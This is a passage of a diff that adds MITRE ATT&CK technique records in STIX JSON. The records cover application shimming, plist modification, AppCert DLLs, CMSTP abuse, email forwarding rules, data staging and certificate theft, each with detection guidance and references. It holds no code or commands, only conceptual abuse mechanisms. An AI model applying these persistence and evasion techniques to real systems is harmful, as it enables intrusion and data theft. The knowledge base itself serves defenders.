for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.", + "url": "https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html" + }, + { + "source_name": "GCP Packet Mirroring", + "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.", + "url": "https://cloud.google.com/vpc/docs/packet-mirroring" + }, + { + "source_name": "Juniper Traffic Mirroring", + "description": "Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.", + "url": "https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html" + }, + { + "source_name": "Azure Virtual Network TAP", + "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Application Shimming", + "description": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any Shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1138", + "external_id": "T1138" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "Black Hat 2015 App Shim", + "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.", + "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Plist File Modification", + "description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as \\~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from \\~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236", + "created": "2022-04-09T15:06:32.458Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1647", + "external_id": "T1647" + }, + { + "source_name": "eset_osx_flashback", + "description": "ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf" + }, + { + "source_name": "fileinfo plist file description", + "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.", + "url": "https://fileinfo.com/extension/plist" + }, + { + "source_name": "wardle chp2 persistence", + "description": "Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.", + "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "AppCert DLLs", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "created": "2020-01-24T14:47:41.795Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/009", + "external_id": "T1546.009" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Sysinternals AppCertDlls Oct 2007", + "description": "Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.", + "url": "https://forum.sysinternals.com/appcertdlls_topic12546.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "CMSTP", + "description": "The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", + "Nik Seetharaman, Palantir" + ], + "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1191", + "external_id": "T1191" + }, + { + "source_name": "Microsoft Connection Manager Oct 2009", + "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)" + }, + { + "source_name": "Twitter CMSTP Usage Jan 2018", + "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.", + "url": "https://twitter.com/ItsReallyNick/status/958789644165894146" + }, + { + "source_name": "MSitPros CMSTP Aug 2017", + "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.", + "url": "https://msitpros.com/?p=3960" + }, + { + "source_name": "Twitter CMSTP Jan 2018", + "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.", + "url": "https://twitter.com/NickTyrer/status/958450014111633408" + }, + { + "source_name": "GitHub Ultimate AppLocker Bypass List", + "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", + "url": "https://github.com/api0cradle/UltimateAppLockerByPassList" + }, + { + "source_name": "Endurant CMSTP July 2018", + "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.", + "url": "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Multi-hop Proxy", + "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1188", + "external_id": "T1188" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Email Forwarding Rule", + "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\n\nIn some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Microsoft Security", + "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)", + "Liran Ravich, CardinalOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "Windows", + "Google Workspace", + "macOS", + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "created": "2020-02-19T18:54:47.103Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114/003", + "external_id": "T1114.003" + }, + { + "source_name": "Mac Forwarding Rules", + "description": "Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.", + "url": "https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac" + }, + { + "source_name": "Pfammatter - Hidden Inbox Rules", + "description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.", + "url": "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/" + }, + { + "source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2", + "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", + "url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/" + }, + { + "source_name": "Microsoft Mail Flow Rules 2023", + "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", + "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Data Staged", + "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian", + "Shane Tully, @securitygypsy" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nConsider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "created": "2017-05-31T21:30:58.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1074", + "external_id": "T1074" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + }, + { + "source_name": "PWC Cloud Hopper April 2017", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.", + "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Steal or Forge Authentication Certificates", + "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Tristan Bennett, Seamless Intelligence", + "Lee Christensen, SpecterOps", + "Thirumalai Natarajan, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Azure AD" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "created": "2022-08-03T03:20:58.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1649", + "external_id": "T1649" + }, + { + "source_name": "GitHub GhostPack Certificates", + "description": "HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.", + "url": 